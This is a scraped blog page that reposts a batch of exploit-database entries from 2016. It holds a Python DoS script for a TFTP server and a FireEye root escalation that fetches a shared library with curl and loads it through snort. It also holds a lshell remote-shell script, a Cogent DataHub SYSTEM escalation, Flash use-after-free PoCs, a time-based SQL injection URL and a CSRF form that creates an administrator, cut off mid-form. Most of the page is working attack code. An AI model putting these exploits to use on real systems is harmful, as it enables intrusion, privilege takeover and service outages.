# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS
# Date: 28-03-2016
# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS
# * https://www.exploit-db.com/exploits/26010/
#
# Category: Denial of Service
# Tested on: Windows XP SP3 English
# Details: Remotely crash TallSoft SNMP TFTP Server
from socket import *
import sys, select
address = ('127.0.0.1', 69)
# sufficient for the crash to work
crash = "\x00\x02\x00"
crash += "\x41"*1019
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(crash, address)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863123437
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=670
The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group:
$ ls -l /data/snort/config/snort.conf
-rw-rw-r-- 1 fenet contents 1332 Dec 2 18:02 /data/snort/config/snort.conf
This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration.
# mount | grep -v noexec | grep rw
...
/dev/sda8 on /var type ext4 (rw,noatime)
/dev/sda11 on /data type ext4 (rw,noatime)
/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0)
tmpfs on /dev/shm type tmpfs (rw)
It looks like /dev/shm is a good candidate for storing a shared library.
First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance:
$ cat test.c
void __attribute__((constructor)) init(void)
{
system("/usr/bin/id > /tmp/output.txt");
}
$ gcc test.c -shared -s -fPIC -o test.so
Now fetch that object on the FireEye machine, and instruct snort to load it:
fireeye$ curl http://example.com/test.so > /dev/shm/test.so
fireeye$ printf “dynamicengine /dev/shm/test.so\n” >> /data/snort/config/snort.conf
The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root:
fireeye$ cat /tmp/output.txt
uid=0(admin) gid=0(root) groups=0(root)
And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678
The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL.
This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET.
See
hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.
[ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G W 3.10.57-g9e1c396 #1
[ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000
[ 56.845731]-(0)[880:tx_thread]PC is at 0x40404040
[ 56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484
[ 56.847092]-(0)[880:tx_thread]pc : [<40404040>] lr : [<c0408be4>] psr: a0000013
[ 56.847092]sp : cb99fdb0 ip : c001813c fp : cb99fe0c
[ 56.848705]-(0)[880:tx_thread]r10: c0cac2f0 r9 : 0000af00 r8 : 00000110
[ 56.849552]-(0)[880:tx_thread]r7 : 0000002c r6 : cc0a63c0 r5 : 00000001 r4 : c0cade08
[ 56.850560]-(0)[880:tx_thread]r3 : 40404040 r2 : 00000040 r1 : dd5d0110 r0 : 00000001
[ 56.851570]-(0)[880:tx_thread]Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel
[ 56.852675]-(0)[880:tx_thread]Control: 10c5387d Table: 9e9b006a DAC: 00000015
[ 56.853585]-(0)[880:tx_thread]
[ 56.853585]LR: 0xc0408b64:
[ 56.854297]8b64 e50b3028 e3a03000 e50b3044 0a00008a e590c0d0 e30639ac e34c30a8 e35c0000
[ 56.855306]8b84 01a0c003 e2851103 e30c3940 e34c30bc e7eb2055 e1a01621 e3a05001 e593e000
[ 56.856314]8ba4 e3a03000 e1a01281 e58d3004 e28114ff e58d5000 e1a03008 e08e1001 e59cc010
[ 56.857323]8bc4 e12fff3c e5943014 e3530000 e50b002c 0a000002 e5933018 e1a00005 e12fff33
[ 56.858332]8be4 e59635cc e2867e5a e2877004 e24b1048 e30650c0 e34c50a6 e1a00007 e5933000
[ 56.859340]8c04 e12fff33 e59635cc e1a00007 e5933004 e12fff33 e5959000 e2899f7d e5953000
[ 56.860349]8c24 e30610c0 e1a00007 e34c10a6 e0693003 e3530000 aa00005b e59635cc e5933010
[ 56.861358]8c44 e12fff33 e3500000 0afffff3 e59635cc e1a00007 e30856a1 e3405001 e5933014
[ 56.862369]-(0)[880:tx_thread]
[ 56.862369]SP: 0xcb99fd30:
[ 56.863083]fd30 00000001 00000110 00000000 40404040 a0000013 ffffffff cb99fd9c 00000110
[ 56.864091]fd50 0000af00 c0cac2f0 cb99fe0c cb99fd68 c000e1d8 c00084b8 00000001 dd5d0110
[ 56.865100]fd70 00000040 40404040 c0cade08 00000001 cc0a63c0 0000002c 00000110 0000af00
[ 56.866108]fd90 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 ffffffff
[ 56.867117]fdb0 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 00000000
[ 56.868126]fdd0 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 e54af000
[ 56.869135]fdf0 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 c0408a28
[ 56.870143]fe10 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 e54b5d14
[ 56.871155]-(0)[880:tx_thread]
[ 56.871155]IP: 0xc00180bc:
[ 56.871868]80bc ee070f36 e0800002 e1500001 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823
[ 56.872877]80dc e203300f e3a02004 e1a02312 e2423001 e1c00003 ee070f3a e0800002 e1500001
[ 56.873885]80fc 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 e203300f e3a02004 e1a02312
[ 56.874894]811c e2423001 e1c00003 ee070f3e e0800002 e1500001 3afffffb f57ff04f e1a0f00e
[ 56.875902]813c e0811000 e3320002 0affffd0 eaffffe1 e0811000 e3320001 1affffcc e1a0f00e
[ 56.876911]815c 00007fff 000003ff e1a0c00d e92dd830 e24cb004 e1a05000 e1a00001 ebfffe6a
[ 56.877920]817c e1a04000 e1a00005 ebfffe67 e1a01004 e1a05000 eb09bf2a e1a00005 ebfffeaa
[ 56.878929]819c e1a00004 ebfffea8 e89da830 e1a0c00d e92dd818 e24cb004 ebfffe5b e3a01a01
[ 56.879940]-(0)[880:tx_thread]
[ 56.879940]FP: 0xcb99fd8c:
[ 56.880653]fd8c 0000af00 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013
[ 56.881662]fdac ffffffff 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000
[ 56.882671]fdcc 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168
[ 56.883679]fdec e54af000 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164
[ 56.884688]fe0c c0408a28 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10
[ 56.885697]fe2c e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 c03da49c e54b6168 e54af000
[ 56.886705]fe4c c0cac2f0 00000000 e54af000 00000000 c0cac2f0 cb99fe8c cb99fe70 c03bd0f4
[ 56.887714]fe6c c03dae1c 00000001 00000000 e54b6168 00000000 cb99fee4 cb99fe90 c03bd540
[ 56.888726]-(0)[880:tx_thread]
[ 56.888726]R1: 0xdd5d0090:
[ 56.889439]0090 00000002 60070193 c0a9d860 00000001 00000003 0d050d04 60070193 60070193
[ 56.890447]00b0 c0a8d800 00002ab0 cb99fe9c cb99fe50 c00d3a84 c001ee84 0b93115f 00000000
[ 56.891456]00d0 ffffffff 00000000 00000036 00000000 75fd19aa cb99fea0 e54dfac4 e54dfab8
[ 56.892465]00f0 e54dfac4 60070113 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99fec4 062e062d
[ 56.893473]0110 00000000 c2ec5c43 e91cd01a 3ef74ed2 256fb013 c9a73709 0d15c700 aa03b775
[ 56.894482]0130 10b66433 696d6e70 4f66e845 6fc5d5f5 fffd363f a9960104 61007ab4 5b193ffc
[ 56.895491]0150 25b0d02e 7fbf9ac1 c3de7bb9 b7bc184f 47c837ed 0d3b82cd aa3d7d38 72ac0fad
[ 56.896499]0170 a469220b 96e646bc 49677d77 a6fae9d7 2d03b2c7 a52e0556 16f0641d 96c95111
[ 56.897511]-(0)[880:tx_thread]
[ 56.897511]R4: 0xc0cadd88:
[ 56.898224]dd88 c0cadc88 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.899233]dda8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.900241]ddc8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.901250]dde8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.902259]de08 41414142 41414141 41414141 41414141 41414141 c0cadc90 000001d3 000001d3
[ 56.903267]de28 000001d2 000000ca 000000c7 00000000 00000000 00000000 00000000 00000000
[ 56.904276]de48 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.905285]de68 00000000 00000000 c04265ec 00000000 00000000 00000000 00000000 00000000
[ 56.906297]-(0)[880:tx_thread]
[ 56.906297]R6: 0xcc0a6340:
[ 56.907009]6340 00000000 00000000 00000000 dead4ead ffffffff ffffffff cc0a6358 cc0a6358
[ 56.908018]6360 df8f9674 dfba8764 df8f9684 00000001 c0b45604 00000000 00000000 00000000
[ 56.909027]6380 00000001 de764130 00000000 00000000 c080e18c 00000000 00000000 00000000
[ 56.910035]63a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.911044]63c0 dd9e1000 00000000 00000075 0000007f 0000a051 00006107 00000000 00000000
[ 56.912053]63e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.913062]6400 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.914070]6420 00000000 cb000000 00000700 00000000 00000000 00000000 00000000 00000000
[ 56.915082]-(0)[880:tx_thread]
[ 56.915082]R10: 0xc0cac270:
[ 56.915806]c270 7f54e330 00000000 7f54e330 00000000 7f5b84c9 00000004 00000000 00000000
[ 56.916814]c290 00000000 00000000 00000001 00000001 00000001 00000000 00000000 00000000
[ 56.917823]c2b0 00000001 00000000 dead4ead ffffffff ffffffff c0cac2c4 c0cac2c4 00000000
[ 56.918832]c2d0 00000000 00000001 600f0113 000c000c dead4ead ffffffff ffffffff 00000000
[ 56.919840]c2f0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.920849]c310 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.921858]c330 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.922866]c350 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248)
[ 56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000)
[ 56.925584]-(0)[880:tx_thread]fda0: 00000001 00000000 c07aeeb8 c029c4b0
[ 56.926801]-(0)[880:tx_thread]fdc0: c0b9d340 00000110 00000000 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670
[ 56.928016]-(0)[880:tx_thread]fde0: 9d5d0000 180f002c e54b6168 e54af000 e54b5d10 00000110 dd5d0000 00000000
[ 56.929230]-(0)[880:tx_thread]fe00: cb99fe6c cb99fe10 c03db164 c0408a28 0000af00 00000004 cb99fe44 cb99fe28
[ 56.930445]-(0)[880:tx_thread]fe20: c03eddf4 00000001 00007d10 e54b5d14 e54af000 00000000 cb99fe6c cb99fe48
[ 56.931660]-(0)[880:tx_thread]fe40: c03da49c e54b6168 e54af000 c0cac2f0 00000000 e54af000 00000000 c0cac2f0
[ 56.932874]-(0)[880:tx_thread]fe60: cb99fe8c cb99fe70 c03bd0f4 c03dae1c 00000001 00000000 e54b6168 00000000
[ 56.934089]-(0)[880:tx_thread]fe80: cb99fee4 cb99fe90 c03bd540 c03bcf6c 000007d0 cc0a63c0 00000000 00000000
[ 56.935304]-(0)[880:tx_thread]fea0: c000009a cc0a6a50 00000000 00000000 cc0a65f8 80000013 cc0a6464 cc0a63c0
[ 56.936519]-(0)[880:tx_thread]fec0: cc0a6a5c cb99e000 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99ff44 cb99fee8
[ 56.937734]-(0)[880:tx_thread]fee0: c03efce4 c03bd300 dd6b1dd4 a0070013 c0cade28 cb99e028 c0090920 cc0a6a50
[ 56.938948]-(0)[880:tx_thread]ff00: 01a5fc40 00000000 dea3b480 c0090920 cb99ff10 cb99ff10 c03ef9d4 dd5bfdbc
[ 56.940163]-(0)[880:tx_thread]ff20: 00000000 dd9e1000 c03ef9d4 00000000 00000000 00000000 cb99ffac cb99ff48
[ 56.941378]-(0)[880:tx_thread]ff40: c008fadc c03ef9e0 ffffffff 00000000 df9958c0 dd9e1000 00000000 00000000
[ 56.942593]-(0)[880:tx_thread]ff60: dead4ead ffffffff ffffffff cb99ff6c cb99ff6c 00000000 00000000 dead4ead
[ 56.943807]-(0)[880:tx_thread]ff80: ffffffff ffffffff cb99ff88 cb99ff88 dd5bfdbc c008fa20 00000000 00000000
[ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000
[ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff
[ 56.948658]Backtrace:
[ 56.948966]-(0)[880:tx_thread][<c0408a1c>] (kalDevPortWrite+0x0/0x484) from [<c03db164>] (nicTxCmd+0x354/0x638)
[ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000
r4:e54b6168
[ 56.951190]-(0)[880:tx_thread][<c03dae10>] (nicTxCmd+0x0/0x638) from [<c03bd0f4>] (wlanSendCommand+0x194/0x220)
[ 56.952449]-(0)[880:tx_thread][<c03bcf60>] (wlanSendCommand+0x0/0x220) from [<c03bd540>] (wlanProcessCommandQueue+0x24c/0x474)
[ 56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001
[ 56.954568]-(0)[880:tx_thread][<c03bd2f4>] (wlanProcessCommandQueue+0x0/0x474) from [<c03efce4>] (tx_thread+0x310/0x640)
[ 56.955927]-(0)[880:tx_thread][<c03ef9d4>] (tx_thread+0x0/0x640) from [<c008fadc>] (kthread+0xbc/0xc0)
[ 56.957088]-(0)[880:tx_thread][<c008fa20>] (kthread+0x0/0xc0) from [<c000e618>] (ret_from_fork+0x14/0x3c)
[ 56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc
[ 56.958970]-(0)[880:tx_thread]Code: bad PC value
[ 56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]---
[ 56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception
The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632
case PRIV_CMD_SW_CTRL:
pu4IntBuf = (PUINT_32)prIwReqData->data.pointer;
prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0];
//kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8);
if (copy_from_user(&prNdisReq->ndisOidContent[0],
prIwReqData->data.pointer,
prIwReqData->data.length)) {
status = -EFAULT;
break;
}
prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL;
prNdisReq->inNdisOidlength = 8;
prNdisReq->outNdisOidLength = 8;
/* Execute this OID */
status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen);
break;
prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqData->data.length is a usermode controlled unsigned short, so the copy_from_user results in memory corruption.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39629.zip
/*
# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE‑2016-2288
sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe
Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released
Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script
Exploitation:
=============
As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
a write into c:\ as guest, but we are in the SCADA world. Anything is possible.
C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Cogent DataHub
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cogent DataHub
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Users\steven>
*/
require ("Application");
require ("AsyncRun"); // thanks to our friends @ Cogent
class WebstreamSupport Application
{
}
method WebstreamSupport.constructor ()
{
RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}
Webstream = ApplicationSingleton (WebstreamSupport);
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=716
https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html
The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes.
This issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is:
var o = {};
o.unwatch();
The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is:
void* args = alloca( args_size );
for( int i = 0; i < args_size; i++){
// Init args
}
if ( ((int) args[0]) & 6 == 6 )
args[0] = call_toString( args[0] );
if ( args_size < 1)
exit();
Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39631.zip
import paramiko
import traceback
from time import sleep
#
# Exploit lshell pathing vulnerability in <= 0.9.15.
# Runs commands on the remote system.
# @dronesec
#
if len(sys.argv) < 4:
print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])
sys.exit(1)
try:
print '[!] .............................'
print '[!] lshell <= 0.9.15 remote shell.'
print '[!] note: you can also ssh in and execute \'/bin/bash\''
print '[!] .............................'
print '[!] Checking host %s...'%(sys.argv[3])
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if len(sys.argv) == 5:
ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
else:
ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
# verify lshell
channel = ssh.invoke_shell()
while not channel.recv_ready(): sleep(1)
ret = channel.recv(2048)
channel.send('help help\n')
while not channel.recv_ready(): sleep(1)
ret = channel.recv(2048)
if not 'lshell' in ret:
if 'forbidden' in ret:
print '[-] Looks like we can\'t execute SSH commands'
else:
print '[-] Environment is not lshell'
sys.exit(1)
# verify vulnerable version
channel.send('sudo\n')
while not channel.recv_ready(): sleep(1)
ret = channel.recv(2048)
if not 'Traceback' in ret:
print '[-] lshell version not vulnerable.'
sys.exit(1)
channel.close()
ssh.close()
# exec shell
print '[+] vulnerable lshell found, preparing pseudo-shell...'
if len(sys.argv) == 5:
ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
else:
ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
while True:
cmd = raw_input('$ ')
# breaks paramiko
if cmd[0] is '/':
print '[!] Running binaries won\'t work!'
continue
cmd = cmd.replace("'", r"\'")
cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))
if len(cmd) > 1:
if 'quit' in cmd or 'exit' in cmd:
break
(stdin,stdout,stderr) = ssh.exec_command(cmd)
out = stdout.read()
print out.strip()
except paramiko.AuthenticationException:
print '[-] Authentication to %s failed.'%sys.argv[3]
except Exception, e:
print '[-] Error: ', e
print type(e)
traceback.print_exc(file=sys.stdout)
finally:
channel.close()
ssh.close()
#####################################################################################
Application: Apple Quicktime
Platforms: Windows, OSX
Versions: before version 7.7.79.80.95
Author: Francis Provencher of COSIG
Website: http://www.protekresearchlab.com/
Twitter: @COSIG_ @protekresearch
CVE-2016-1767
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
(https://en.wikipedia.org/wiki/QuickTime)
#####################################################################################
============================
2) Report Timeline
============================
2016-01-07: Francis Provencher from COSIG report issue to Apple security team;
2016-01-13: Apple security team confirmed this issue;
2016-03-22: Apple fixed this issue;
https://support.apple.com/en-us/HT206167
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
By providing a malformed FPX file, an attacker is able to create controlled memory corruption, and execute code in the context of the current user.
#####################################################################################
===========
4) POC
===========
Proof of Concept:
http://protekresearchlab.com/exploits/COSIG-2016-14.fpx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39633.zip
###############################################################################
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=611
There is a use-after-free in URLStream.readObject. If the object read is a registered class, the constructor will get invoked to create the object. If the constructor calls URLStream.close, the URLStream will get freed, and then the deserialization function will continue to write to it.
A minimal PoC is as follows:
//In main
flash.net.registerClassAlias("bob", myclass);
var u:URLStream = new URLStream();
myclass.u = u;
u.addEventListener(Event.COMPLETE, func);
u.load(new URLRequest("file.txt"));
function func(){
trace(u.readObject());
}
// in myclass
static public var u;
public function myclass()
{
u.close();
}
A sample script and SWF are attached. Note that file.txt needs to be in the same folder as getproperty.swf on a remote server.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39649.zip
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: April 6, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in database and compromise the entire website.
The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to "/index.php" script. A remote unauthenticated attacker can modify present query and execute arbitrary SQL commands in application's database.
A simple exploit below uses time-based SQL injection technique to demonstrate existence of the vulnerability. The following HTTP request will make page render for 99 seconds, if MySQL server version is is equal "5":
http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
-----------------------------------------------------------------------------------------------
Solution:
Update to SocialEngine 4.8.10
More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal:
--------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value=" <TEST></TEST> " />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test@testingus.io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984-01-01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account Managers" />
<input type="hidden" name="usergroups" value="Company Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event Managers" />
<input type="hidden" name="usergroups" value="Financial Officers" />
<input type="hidden" name="usergroups" value="Forum Moderator" />
<input type="hidden" name="usergroups" value="Human Resources" />
<input type="hidden" name="usergroups" value="Intranet Managers" />
<input type="hidden" name="usergroups" value="Intranet Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press Officers" />
<input type="hidden" name="usergroups" value="Product Managers" />
<input type="hidden" name="usergroups" value="Registered Users" />
<input type="hidden" name="usergroups" value="Shop Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
<input type="hidden" name="usergroups" value="Support Ticket Users" />
<input type="hidden" name="usergroups" value="User Managers" />
<input type="hidden" name="usergroups" value="Website Administrators" />
<input type="hidden" name="usergroups" value="Website Developers" />
<input type="hidden" name="users_group" value="" />
<input type="hidden" name="users_type" value="" />
<input type="hidden" name="creators_group" value="" />
<input type="hidden" name="creators_type" value="" />
<input type="hidden" name="editors_group" value="" />
<input type="hidden" name="editors_type" value="" />
<input type="hidden" name="publishers_group" value="" />
